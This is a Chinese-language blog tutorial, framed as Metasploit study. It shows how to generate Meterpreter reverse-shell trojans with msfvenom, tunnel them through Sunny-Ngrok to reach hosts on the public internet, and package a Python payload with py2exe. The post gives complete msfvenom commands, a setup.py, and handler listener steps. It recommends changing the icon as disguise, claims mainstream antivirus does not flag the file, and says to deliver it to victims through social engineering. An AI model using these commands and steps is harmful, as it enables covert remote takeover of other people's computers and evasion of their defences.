欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

metasploit学习--联合Ngrok内网穿透生成木马远控主机

程序员文章站 2022-07-15 13:41:59
...

一、msf生成木马,联合Sunny-Ngrok进行内网穿透,远程控制外网主机

1.链接隧道 ./sunny clientid 隧道id
2.生成木马

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell.exe

这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了。
注意:
-a x64位,一定要对应-p x64位。
简单点来说,生成的exe是64位的,最好是只在64位的电脑上去运行。
千万不要把生成32位的exe放到64位的电脑上去运行,那样会造成失败或内存、CPU很高的情况。
6.msf开启监听,使用模块

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit

这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run
7.结果,获取成功
metasploit学习--联合Ngrok内网穿透生成木马远控主机
外网主机也可以获取
metasploit学习--联合Ngrok内网穿透生成木马远控主机

二、利用py2exe生成免杀木马

1.链接隧道 ./sunny clientid 隧道id
2.生成木马

msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxx -f raw -o shell.py 

这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了
3.新建一个setup.py文件,代码如下:

from distutils.core import setup
import py2exe
setup(
    name = 'Meter',
    description =  'Python-based App',
    version = '1.0',
    console = ['shell.py'],
    options = {'py2exe':{'bundle_files':1,'packages':'ctypes','includes':'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
    zipfile = None,
)

上面的console = [‘shell.py’] 里面是你刚刚生成py文件的名字

4.把setup.py和shell.py放在同一个文件夹,cmd进入路径,用pythoon py2exe模块进行封装生成可执行程序

python ./setup.py py2exe

metasploit学习--联合Ngrok内网穿透生成木马远控主机
5.生成完成之后,找到执行文件,可以替换图标实现伪装效果
metasploit学习--联合Ngrok内网穿透生成木马远控主机
6.查看免杀效果,基本上主流杀软都不报毒
metasploit学习--联合Ngrok内网穿透生成木马远控主机
metasploit学习--联合Ngrok内网穿透生成木马远控主机
6.msf开启监听

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit

这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run

7.通过社工等手段,发送给受害人,执行打开,即可获取shell
metasploit学习--联合Ngrok内网穿透生成木马远控主机

相关标签: msf